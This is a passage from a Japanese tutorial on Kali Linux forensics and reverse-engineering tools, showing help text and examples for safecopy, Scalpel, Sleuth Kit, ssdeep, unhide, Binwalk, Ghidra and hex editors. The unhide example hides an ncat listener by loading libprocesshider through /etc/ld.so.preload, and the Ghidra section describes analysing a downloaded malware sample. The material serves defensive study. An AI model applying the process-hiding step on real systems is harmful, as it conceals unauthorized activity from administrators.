Warning: Without this option, the destination file
will be emptied prior to writing.
Use -I /dev/null if you want to continue a previous
run of safecopy without a badblock list.
Implies: -c 0 if -c is not specified
Default: none ( /dev/null if -c is given )
-i <bytes> : Blocksize to interpret the badblockfile given with -I.
Default: Blocksize as specified by -b
-c <blocks> : Continue copying at this position.
This allows continuing if the output is a block device
with a fixed size as opposed to a growable file,
where safecopy cannot determine how far it already got.
The blocksize used is the same as for the -I option.
-c 0 will continue at the current destination size.
Implies: -I /dev/null if -I is not specified
Default: none, 0 if -I is specified
-X <badblockfile> : Exclusion mode. If used together with -I,
excluded blocks override included blocks.
Safecopy will not read or write any data from
areas covered by exclude blocks.
Default: none ( 0 if -I is given )
-x <bytes> : Blocksize to interpret the badblockfile given with -X.
Default: Blocksize as specified by -b
-o <badblockfile> : Write a badblocks/e2fsck compatible bad block file.
Default: none
-S <seekscript> : Use external script for seeking in input file.
(Might be useful for tape devices and similar).
Seekscript must be an executable that takes the
number of blocks to be skipped as argv1 (1-64)
the blocksize in bytes as argv2
and the current position (in bytes) as argv3.
Return value needs to be the number of blocks
successfully skipped, or 0 to indicate seek failure.
The external seekscript will only be used
if lseek() fails and we need to skip over data.
Default: none
-M <string> : Mark unrecovered data with this string instead of
skipping it. This helps in later finding corrupted
files on rescued file system images.
The default is to zero unreadable data on creation
of output files, and leaving the data as it is
on any later run.
Warning: When used in combination with
incremental mode (-I) this may overwrite data
in any block that occurs in the -I file.
Blocks not in the -I file, or covered by the file
specified with -X are save from being overwritten.
Default: none
--debug <level> : Enable debug output. Level is a bit field,
add values together for more information:
program flow: 1
IO control: 2
badblock marking: 4
seeking: 8
incremental mode: 16
exclude mode: 32
or for all debug output: 255
Default: 0
-T <timingfile> : Write sector read timing information into
this file for later analysis.
Default: none
-h | --help : Show this text
Valid parameters for -f -r -b <size> options are:
<integer> Amount in bytes - i.e. 1024
<percentage>% Percentage of whole file/device size - e.g. 10%
<number>* -b only, number times blocksize reported by OS
<number>* -f and -r only, number times the value of -b
■ 使用例
# エラーセクターを挿入したブロックデバイスを作成
root@kali:~# dmsetup create baddevice << EOF
0 2000 linear /dev/loop0 0
2000 96 error
2096 202704 linear /dev/loop0 2096
EOF
# エラーがあるデバイスをイメージにコピー
root@kali:~# safecopy /dev/mapper/baddevice backup.img
Low level device calls enabled mode: 1
Reported hw blocksize: 4096
Reported low level blocksize: 4096
Filesize not reported by stat(), trying seek().
File size: 105930752
Blocksize: 4096
Fault skip blocksize: 65536
Resolution: 4096
Min read attempts: 3
Head moves on read error: 1
Starting block: 0
Source: /dev/mapper/baddevice
Destination: backup.img
.!{X<<<<}[262](+49152)
......................... ;-} 100%
Done!
Recovered bad blocks: 0
Unrecoverable bad blocks (bytes): 1 (49152)
Blocks (bytes) copied: 25862 (105930752)
Scalpel
FAT16、FAT32、exFAT、NTFS、Ext2、Ext3、Ext4、JFS、XFS、ReiserFS、raw パーティションなどからデータをヘッダ、フッタ、および内部データ構造に基づいて解析してファイルを復元します(ファイルカービング)。
■ 使用方法
root@kali:~# scalpel -h
Usage: scalpel [-b] [-c <config file>] [-d] [-h|V] [-i <file>]
[-m blocksize] [-n] [-o <outputdir>] [-O num] [-q clustersize]
[-r] [-s num] [-t <blockmap file>] [-u] [-v]
<imgfile> [<imgfile>] ...
-b Carve files even if defined footers aren\'t discovered within
maximum carve size for file type [foremost 0.69 compat mode].
-c Choose configuration file.
-d Generate header/footer database; will bypass certain optimizations
and discover all footers, so performance suffers. Doesn\'t affect
the set of files carved. **EXPERIMENTAL**
-h Print this help message and exit.
-i Read names of disk images from specified file.
-m Generate/update carve coverage blockmap file. The first 32bit
unsigned int in the file identifies the block size. Thereafter
each 32bit unsigned int entry in the blockmap file corresponds
to one block in the image file. Each entry counts how many
carved files contain this block. Requires more memory and
disk. **EXPERIMENTAL**
-n Don\'t add extensions to extracted files.
-o Set output directory for carved files.
-O Don\'t organize carved files by type. Default is to organize carved files
into subdirectories.
-p Perform image file preview; audit log indicates which files
would have been carved, but no files are actually carved.
-q Carve only when header is cluster-aligned.
-r Find only first of overlapping headers/footers [foremost 0.69 compat mode].
-s Skip n bytes in each disk image before carving.
-t Set directory for coverage blockmap. **EXPERIMENTAL**
-u Use carve coverage blockmap when carving. Carve only sections
of the image whose entries in the blockmap are 0. These areas
are treated as contiguous regions. **EXPERIMENTAL**
-V Print copyright information and exit.
-v Verbose mode
■ 使用例
root@kali:~# scalpel -o ./recover /dev/sda1
Carve lists built. Workload:
art with header "\x4a\x47\x04\x0e" and footer "\xcf\xc7\xcb" --> 0 files
art with header "\x4a\x47\x03\x0e" and footer "\xd0\xcb\x00\x00" --> 0 files
gif with header "\x47\x49\x46\x38\x37\x61" and footer "\x00\x3b" --> 0 files
gif with header "\x47\x49\x46\x38\x39\x61" and footer "\x00\x3b" --> 2 files
jpg with header "\xff\xd8\xff\x3f\x3f\x3f\x45\x78\x69\x66" and footer "\xff\xd9" --> 0 files
jpg with header "\xff\xd8\xff\x3f\x3f\x3f\x4a\x46\x49\x46" and footer "\xff\xd9" --> 5 files
png with header "\x50\x4e\x47\x3f" and footer "\xff\xfc\xfd\xfe" --> 0 files
[...]
Scalpel is done, files carved = 1420, elapsed = 6 seconds.
The Sleuth Kit
コマンドラインデジタルフォレンジックツールのライブラリとコレクションです。
■ 使用方法
root@kali:~# tsk_comparedir --help
usage: tsk_comparedir [-f fstype] [-i imgtype] [-b dev_sector_size] [-o sector_offset] [-P pooltype] [-B pool_volume_block] [-n start_inum] [-vV] image [image] comparison_directory
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: The file system type (use '-f list' for supported types)
-o sector_offset: sector offset for file system to compare
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-n start_inum: inum for directory in image file to start compare at
-v: verbose output to stderr
-V: Print version
root@kali:~# tsk_gettimes --help
usage: tsk_gettimes [-vVm] [-i imgtype] [-b dev_sector_size] [-z zone] [-s seconds] image [image]
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-m: Calculate MD5 hash in output (slow)
-v: verbose output to stderr
-V: Print version
-z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l)
-s seconds: Time skew of original machine (in seconds) (only useful with -l & -m)
root@kali:~# tsk_recover --help
usage: tsk_recover [-vVae] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o sector_offset] [-P pooltype] [-B pool_volume_block] [-d dir_inum] image [image] output_dir
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: The file system type (use '-f list' for supported types)
-v: verbose output to stderr
-V: Print version
-a: Recover allocated files only
-e: Recover all files (allocated and unallocated)
-o sector_offset: sector offset for a volume to recover (recovers only that volume)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-d dir_inum: Directory inum to recover from (must also specify a specific partition using -o or there must not be a volume system)
root@kali:~# fsstat --help
usage: fsstat [-tvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] image
-t: display type only
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-v: verbose output to stderr
-V: Print version
-k password: Decryption password for encrypted volumes
root@kali:~# ffind --help
usage: ffind [-aduvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] image [images] inode
-a: Find all occurrences
-d: Find deleted entries ONLY
-u: Find undeleted entries ONLY
-f fstype: Image file system type (use '-f list' for supported types)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-v: Verbose output to stderr
-V: Print version
root@kali:~# fls --help
usage: fls [-adDFlhpruvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-m dir/] [-o imgoffset] [-z ZONE] [-s seconds] image [images] [inode]
If [inode] is not given, the root directory is used
-a: Display "." and ".." entries
-d: Display deleted entries only
-D: Display only directories
-F: Display only files
-l: Display long version (like ls -l)
-i imgtype: Format of image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-m: Display output in mactime input format with
dir/ as the actual mount point of the image
-h: Include MD5 checksum hash in mactime output
-o imgoffset: Offset into image file (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-S snap_id: Snapshot ID (for APFS only)
-p: Display full path for each file
-r: Recurse on directory entries
-u: Display undeleted entries only
-v: verbose output to stderr
-V: Print version
-z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l)
-s seconds: Time skew of original machine (in seconds) (only useful with -l & -m)
-k password: Decryption password for encrypted volumes
root@kali:~# icat --help
usage: icat [-hrRsvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] image [images] inum[-typ[-id]]
-h: Do not display holes in sparse files
-r: Recover deleted file
-R: Recover deleted file and suppress recovery errors
-s: Display slack space at end of file
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-S snap_id: Snapshot ID (for APFS only)
-v: verbose to stderr
-V: Print version
-k password: Decryption password for encrypted volumes
root@kali:~# ifind --help
usage: ifind [-alvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] [-d unit_addr] [-n file] [-p par_addr] [-z ZONE] image [images]
-a: find all inodes
-d unit_addr: Find the meta data given the data unit
-l: long format when -p is given
-n file: Find the meta data given the file name
-p par_addr: Find UNALLOCATED MFT entries given the parent\'s meta address (NTFS only)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-v: Verbose output to stderr
-V: Print version
-z ZONE: Time zone setting when -l -p is given
root@kali:~# istat --help
usage: istat [-N num] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] [-z zone] [-s seconds] [-rvV] image inum
-N num: force the display of NUM address of block pointers
-r: display run list instead of list of block addresses
-z zone: time zone of original machine (i.e. EST5EDT or GMT)
-s seconds: Time skew of original machine (in seconds)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-f fstype: File system type (use '-f list' for supported types)
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-S snap_id: Snapshot ID (for APFS only)
-v: verbose output to stderr
-V: print version
-k password: Decryption password for encrypted volumes
root@kali:~# blkcat --help
usage: blkcat [-ahsvVw] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] [-u usize] image [images] unit_addr [num]
-a: displays in all ASCII
-h: displays in hexdump-like fashion
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-p list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-f fstype: File system type (use '-f list' for supported types)
-s: display basic block stats such as unit size, fragments, etc.
-v: verbose output to stderr
-V: display version
-w: displays in web-like (html) fashion
-u usize: size of each data unit in image (for raw, blkls, swap)
[num] is the number of data units to display (default is 1)
root@kali:~# blkls --help
usage: blkls [-aAelvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] [-P pooltype] [-B pool_volume_block] image [images] [start-stop]
-e: every block (including file system metadata blocks)
-l: print details in time machine list format
-a: Display allocated blocks
-A: Display unallocated blocks
-f fstype: File system type (use '-f list' for supported types)
-i imgtype: The format of the image file (use '-i list' for supported types)
-b dev_sector_size: The size (in bytes) of the device sectors
-o imgoffset: The offset of the file system in the image (in sectors)
-P pooltype: Pool container type (use '-P list' for supported types)
-B pool_volume_block: Starting block (for pool volumes only)
-s: print slack space only (other flags are ignored
-v: verbose to stderr
-V: print version
■ 使用例
root@kali:~# tsk_comparedir app.img /var/www/
file: /app/evil.sh not found in image file
All files in image found in directory
root@kali:~# tsk_gettimes app.img
0|.editorconfig|46|r/rrw-r--r--|0|0|258|1731479609|1731479609|1731479609|1731479609
0|.env.|61|r/rrw-r--r--|0|0|1009|1731479609|1731479609|1731479609|1731479609
0|.styleci.yml|64|r/rrw-r--r--|0|0|194|1731479609|1731479609|1731479609|1731479609
0|app|67|d/drwxr-xr-x|0|0|1024|1731479609|1731479609|1731479609|1731479609
0|app/Console|68|d/drwxr-xr-x|0|0|1024|1731479609|1731479609|1731479609|1731479609
0|app/Console/Kernel.php|69|r/rrw-r--r--|0|0|827|1731479609|1731479609|1731479609|1731479609
[...]
root@kali:~# tsk_recover -a app.img recover
Files Recovered: 110
root@kali:~# fsstat app.img
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext4
Volume Name:
Volume ID: 551ab0a2cd5665921a43a817ba6b392b
Last Written at: 2024-11-13 06:35:57 (UTC)
Last Checked at: 2024-11-13 06:32:28 (UTC)
Last Mounted at: 2024-11-13 06:32:38 (UTC)
Unmounted properly
Last mounted on: /mnt
Source OS: Linux
Dynamic Structure
Compat Features: Journal, Ext Attributes, Resize Inode, Dir Index
InCompat Features: Filetype, Extents, 64bit, Flexible Block Groups,
Read Only Compat Features: Sparse Super, Large File, Huge File, Extra Inode Size
Journal ID: 00
Journal Inode: 8
METADATA INFORMATION
--------------------------------------------
Inode Range: 1 - 25585
Root Directory: 2
Free Inodes: 25418
Inode Size: 256
CONTENT INFORMATION
--------------------------------------------
Block Groups Per Flex Group: 16
Block Range: 0 - 102399
Block Size: 1024
Reserved Blocks Before Block Groups: 1
Free Blocks: 89679
[...]
root@kali:~# ffind app.img 169
/public/index.php
root@kali:~# fls app.img 67
d/d 68: Console
d/d 70: Exceptions
d/d 72: Http
d/d 109: Models
d/d 114: Providers
d/d 120: Services
root@kali:~# fls app.img 109
r/r 110: Article.php
r/r 111: Comment.php
r/r 112: Tag.php
r/r 113: User.php
root@kali:~# icat app.img 135
<?php
use Illuminate\Support\Str;
return [
/*
|--------------------------------------------------------------------------
| Default Database Connection Name
|--------------------------------------------------------------------------
|
| Here you may specify which of the database connections below you wish
| to use as your default connection for all database work. Of course
| you may use many connections at once using the Database library.
|
*/
'default' => env('DB_CONNECTION', 'mysql'),
[...]
root@kali:~# ifind app.img -n config/database.php
135
root@kali:~# istat app.img 135
inode: 135
Allocated
Group: 0
Generation Id: 2918770598
uid / gid: 0 / 0
mode: rrw-r--r--
Flags: Extents,
size: 5054
num of links: 1
Inode Times:
Accessed: 2024-11-13 06:33:29.305026079 (UTC)
File Modified: 2024-11-13 06:33:29.305026079 (UTC)
Inode Modified: 2024-11-13 06:33:29.305026079 (UTC)
File Created: 2024-11-13 06:33:29.305026079 (UTC)
Direct Blocks:
10368 10369 10370 10371 10372
root@kali:~# blkcat app.img 10368
<?php
use Illuminate\Support\Str;
return [
/*
|--------------------------------------------------------------------------
| Default Database Connection Name
|--------------------------------------------------------------------------
|
| Here you may specify which of the database connections below you wish
| to use as your default connection for all database work. Of course
| you may use many connections at once using the Database library.
|
*/
'default' => env('DB_CONNECTION', 'mysql'),
/*
|--------------------------------------------------------------------------
| Database Connections
|--------------------------------------------------------------------------
|
| Here are each of the database connections setup for your application.
| Of course, examples of configuring each database platform that is
| supported by Laravel is shown below to make development simple.
|
|
| All database work in Laravel is done through th
root@kali:~# blkls -a app.img 10368-10372
<?php
use Illuminate\Support\Str;
return [
/*
|--------------------------------------------------------------------------
| Default Database Connection Name
|--------------------------------------------------------------------------
|
| Here you may specify which of the database connections below you wish
| to use as your default connection for all database work. Of course
| you may use many connections at once using the Database library.
|
*/
'default' => env('DB_CONNECTION', 'mysql'),
[...]
'cache' => [
'url' => env('REDIS_URL'),
'host' => env('REDIS_HOST', '127.0.0.1'),
'password' => env('REDIS_PASSWORD', null),
'port' => env('REDIS_PORT', '6379'),
'database' => env('REDIS_CACHE_DB', '1'),
],
],
];
ssdeep
Fuzzy Hashingの再帰的な計算とマッチングのためのツールです。 通常のハッシュ(md5sum、sha1sumなど)のようにファイルを比較するのに使用できますが、ほとんど違いのない類似ファイルを見つけることができます。
■ 使用方法
root@kali:~# ssdeep -h
Usage: ssdeep [-m file] [-k file] [-dpgvrsblcxa] [-t val] [-h|-V] [FILES]
-m - Match FILES against known hashes in file
-k - Match signatures in FILES against signatures in file
-d - Directory mode, compare all files in a directory
-p - Pretty matching mode. Similar to -d but includes all matches
-g - Cluster matches together
-v - Verbose mode. Displays filename as its being processed
-r - Recursive mode
-s - Silent mode; all errors are suppressed
-b - Uses only the bare name of files; all path information omitted
-l - Uses relative paths for filenames
-c - Prints output in CSV format
-x - Compare FILES as signature files
-a - Display all matches, regardless of score
-t - Only displays matches above the given threshold
-h - Display this help message
-V - Display version number and exit
■ 使用例
# ファイル中のproductionをdevelopmentに置換したファイルを作成
root@kali:~# sed -e 's/production/development/' config/app.php > tmp.php
# MD5ハッシュを確認(ハッシュ値が一致するファイルはない)
root@kali:~# md5sum tmp.php
9ae37d6fad53f2aa5263dec0f8901b46 tmp.php
root@kali:~# find config/ -type f -exec md5sum {} \;
488b21f09c887ceb3306242d0500736f config/cache.php
18c47205e34848ffffd98d4d65bd8e13 config/session.php
fbb56a82ae25fc5d2ce556acf26838ad config/logging.php
04bad29c587cf3fe5f1c7b7f63262c19 config/app.php
b65c6daa01e89ecd22338a88fbae40ce config/auth.php
52654f1235518c1e978f8766a0fbbec9 config/filesystems.php
3dfc6aef3bd17072e52a421d8d5215c0 config/mail.php
b7b09d68f8893547a7e5fbd5207fc8fa config/database.php
e3185f8bf937203123588b3884abf896 config/services.php
fa588a4871790fca01d6a90af9208d15 config/queue.php
# ハッシュファイルを作成
root@kali:~# ssdeep -b tmp.php > hashes.txt
root@kali:~# cat hashes.txt
ssdeep,1.1--blocksize:hash:hash,filename
96:oZNbtsJtvFihlv8eJuW7QPupYT3z7bGdA:KNbtcvkhlvxJuAQSrdA,"tmp.php"
# ハッシュファイルを使用してディレクトリ配下の類似ファイルを検索
root@kali:~# ssdeep -b -m hashes.txt -d -r config
app.php matches hashes.txt:tmp.php (97)
Unhide
rootkits / LKMやその他の隠蔽技術によって隠されたプロセスやTCP/UDPポートを見つけるためのフォレンジックツールです。
■ 使用方法
root@kali:~# unhide -h
Usage: unhide [options] test_list
Option :
-V Show version and exit
-v verbose
-h display this help
-m more checks (available only with procfs, checkopendir & checkchdir commands)
-r use alternate sysinfo test in meta-test
-f log result into unhide-linux.log file
-o same as '-f'
-d do a double check in brute test
-u inhibit stdout buffering of subprocesses (needs stdbuf command)
Test_list :
Test_list is one or more of the following
Standard tests :
brute
proc
procall
procfs
quick
reverse
sys
Elementary tests :
checkbrute
checkchdir
checkgetaffinity
checkgetparam
checkgetpgid
checkgetprio
checkRRgetinterval
checkgetsched
checkgetsid
checkkill
checknoprocps
checkopendir
checkproc
checkquick
checkreaddir
checkreverse
checksysinfo
checksysinfo2
checksysinfo3
■ 使用例
# libprocesshiderを使用してncatのプロセスを隠匿する
root@kali:~# git clone https://github.com/gianlucaborello/libprocesshider
root@kali:~# cd libprocesshider
root@kali:~# sed -i 's/evil_script.py/ncat/' processhider.c
root@kali:~# make
root@kali:~# mv libprocesshider.so /usr/local/lib
root@kali:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
# ncatを実行してもプロセスに表示されない
root@kali:~# ncat -l
root@kali:~# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4796 3972 pts/0 Ss 02:38 0:00 bash
root 2602 0.0 0.0 5572 3400 pts/1 R+ 11:45 0:00 ps aux
# 隠匿されているプロセスを表示
root@kali:~# unhide sys
[*]Searching for Hidden processes through getpriority() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through getpgid() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through getsid() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_getaffinity() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_getparam() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_getscheduler() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_rr_get_interval() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through kill(..,0) scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through comparison of results of system calls
Malware Analysis and Reverse Engineering
Binwalk
バイナリイメージの分析やファイルの抽出などを行います。
■ 使用方法
root@kali:~# binwalk --help
Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...
Signature Scan Options:
-B, --signature Scan target file(s) for common file signatures
-R, --raw=<str> Scan target file(s) for the specified sequence of bytes
-A, --opcodes Scan target file(s) for common executable opcode signatures
-m, --magic=<file> Specify a custom magic file to use
-b, --dumb Disable smart signature keywords
-I, --invalid Show results marked as invalid
-x, --exclude=<str> Exclude results that match <str>
-y, --include=<str> Only show results that match <str>
Extraction Options:
-e, --extract Automatically extract known file types
-D, --dd=<type[:ext[:cmd]]> Extract <type> signatures (regular expression), give the files an extension of <ext>, and execute <cmd>
-M, --matryoshka Recursively scan extracted files
-d, --depth=<int> Limit matryoshka recursion depth (default: 8 levels deep)
-C, --directory=<str> Extract files/folders to a custom directory (default: current working directory)
-j, --size=<int> Limit the size of each extracted file
-n, --count=<int> Limit the number of extracted files
-0, --run-as=<str> Execute external extraction utilities with the specified user\'s privileges
-1, --preserve-symlinks Do not sanitize extracted symlinks that point outside the extraction directory (dangerous)
-r, --rm Delete carved files after extraction
-z, --carve Carve data from files, but don\'t execute extraction utilities
-V, --subdirs Extract into sub-directories named by the offset
Entropy Options:
-E, --entropy Calculate file entropy
-F, --fast Use faster, but less detailed, entropy analysis
-J, --save Save plot as a PNG
-Q, --nlegend Omit the legend from the entropy plot graph
-N, --nplot Do not generate an entropy plot graph
-H, --high=<float> Set the rising edge entropy trigger threshold (default: 0.95)
-L, --low=<float> Set the falling edge entropy trigger threshold (default: 0.85)
Binary Diffing Options:
-W, --hexdump Perform a hexdump / diff of a file or files
-G, --green Only show lines containing bytes that are the same among all files
-i, --red Only show lines containing bytes that are different among all files
-U, --blue Only show lines containing bytes that are different among some files
-u, --similar Only display lines that are the same between all files
-w, --terse Diff all files, but only display a hex dump of the first file
Raw Compression Options:
-X, --deflate Scan for raw deflate compression streams
-Z, --lzma Scan for raw LZMA compression streams
-P, --partial Perform a superficial, but faster, scan
-S, --stop Stop after the first result
General Options:
-l, --length=<int> Number of bytes to scan
-o, --offset=<int> Start scan at this file offset
-O, --base=<int> Add a base address to all printed offsets
-K, --block=<int> Set file block size
-g, --swap=<int> Reverse every n bytes before scanning
-f, --log=<file> Log results to file
-c, --csv Log results to file in CSV format
-t, --term Format output to fit the terminal window
-q, --quiet Suppress output to stdout
-v, --verbose Enable verbose output
-h, --help Show help output
-a, --finclude=<str> Only scan files whose names match this regex
-p, --fexclude=<str> Do not scan files whose names match this regex
-s, --status=<int> Enable the status server on the specified port
■ 使用例
# バイナリデータ内に出現するファイル署名を調べ結果を表示する
root@kali:~# binwalk --signature --term c7v5_2022-07-15_17.44.43.bin
DECIMAL HEXADECIMAL DESCRIPTION
------------------------------------------------------------------------------------------------------------------------------------------------
21876 0x5574 U-Boot version string, "U-Boot 1.1.4-gd4bfd123-dirty (Jul 14 2022 - 23:57:56)"
21940 0x55B4 CRC32 polynomial table, big endian
23232 0x5AC0 uImage header, header size: 64 bytes, header CRC: 0xA1469C27, created: 2022-07-15 03:57:57, image size: 41170
bytes, Data Address: 0x80010000, Entry Point: 0x80010000, data CRC: 0xB2EA616D, OS: Linux, CPU: MIPS, image
type: Firmware Image, compression type: lzma, image name: "u-boot image"
23296 0x5B00 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 97476 bytes
65038 0xFE0E XML document, version: "1.0"
78785 0x133C1 uImage header, header size: 64 bytes, header CRC: 0xB741C427, created: 2022-07-15 04:04:07, image size: 1088720
bytes, Data Address: 0x80060000, Entry Point: 0x80060000, data CRC: 0x53BA779B, OS: Linux, CPU: MIPS, image
type: Multi-File Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.3.8"
78857 0x13409 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3164228 bytes
1167570 0x11D0D2 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 14547308 bytes, 2603 inodes, blocksize:
65536 bytes, created: 2022-07-15 09:17:42
15714887 0xEFCA47 gzip compressed data, from Unix, last modified: 2022-07-15 09:18:19
# 得られた情報をもとにカーネルイメージを展開してカーネルのビルドに使われた環境を調べる
root@kali:~# dd if=c7v5_2022-07-15_17.44.43.bin of=uImage bs=1 skip=78785 count=1088792
1088792+0 records in
1088792+0 records out
1088792 bytes (1.1 MB, 1.0 MiB) copied, 2.20989 s, 493 kB/s
root@kali:~# dd if=uImage of=Image.lzma bs=1 skip=72
1088720+0 records in
1088720+0 records out
1088720 bytes (1.1 MB, 1.0 MiB) copied, 2.20171 s, 494 kB/s
root@kali:~# unlzma -d < Image.lzma > Image
root@kali:~# strings Image | grep "Linux version"
Linux version 3.3.8 (gcc version 4.6.3 20120201 (prerelease) (Linaro GCC 4.6-2012.02) ) #1 Fri Jul 15 00:03:58 EDT 2022
edb
バイナリコードの静的/動的解析を行うためのGUIデバッガーです。
■ 使用方法
root@kali:~# edb --help
Usage: edb [OPTIONS]
--attach <pid> : attach to running process
--run <program> (args...) : execute specified <program> with <args>
--stdin <filename> : set the STDIN of the target process (MUST preceded --run)
--stdout <filename> : set the STDOUT of the target process (MUST preceded --run)
--version : output version information and exit
--dump-version : display terse version string and exit
--help : display this help and exit
BinaryInfoPlugin::BinaryInfo
--symbols <filename> : generate symbols for <filename> and exit
■ 使用方法
root@kali:~# edb --run /usr/bin/ssh
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Starting edb version: 1.3.0
[...]
Ghidra
ソフトウェアをリバースエンジニアリングするためのGUIツールです。Windows、macOS、Linux を含む様々なプラットフォーム上でコンパイル済みのコードを解析することができます。
■ 使用例
root@kali:~# ghidra
https://github.com/MalwareSamples/Linux-Malware-Samplesからマルウェアのバイナリをダウンロードして解析
main関数
processCmd関数をコール。
processCmd関数
指定されたパラメーターに応じてHTTPリクエストを送信。
SendHttpRand関数、SendHTTP関数
不審なHTTPリクエスト(HTTP Request Smuggling?)を送信。
不審なHTTPリクエスト(CloudflareのCAPTCHA Challengeをバイパス?)を送信。
HexWalk
Hexエディタ/ビューアー/アナライザーです。バイナリ分析、バイトマップ表示、ハッシュ値計算、差分比較などの機能を搭載しています。
■ 使用方法
root@kali:~# hexwalk --help-all
Usage: hexwalk [options] file
Options:
-h, --help Displays help on commandline options.
--help-all Displays help including Qt specific
options.
--qmljsdebugger <value> Activates the QML/JS debugger with a
specified port. The value must be of
format port:1234[,block]. "block" makes
the application wait for a connection.
--platform <platformName[:options]> QPA plugin. See QGuiApplication
documentation for available options for
each plugin.
--platformpluginpath <path> Path to the platform plugins.
--platformtheme <theme> Platform theme.
--plugin <plugin> Additional plugins to load, can be
specified multiple times.
--qwindowgeometry <geometry> Window geometry for the main window,
using the X11-syntax, like 100x100+50+50.
--qwindowicon <icon> Default window icon.
--qwindowtitle <title> Title of the first window.
--reverse Sets the application\'s layout direction
to Qt::RightToLeft (debugging helper).
--session <session> Restores the application from an earlier
session.
■ 使用例
root@kali:~# hexwalk c7v5_us.bin
エディタからBinwalkを実行して分析
ImHex
バイナリデータの表示、デコード、リバースエンジニアリング、情報の抽出、値のパッチを行うための多機能Hexエディターです。以下のような機能を備えています。
- カスタムパターンマッチングおよび分析スクリプト言語
- 視覚的なノードベースのデータプリプロセッサ
- 逆アセンブラ
- YARAルールの実行と視覚化
- ブックマーク
- バイナリデータの差分
■ 使用例
マルウェアのサンプルにYARAルールを実行。ルールにマッチした個所をハイライト表示
INetSim
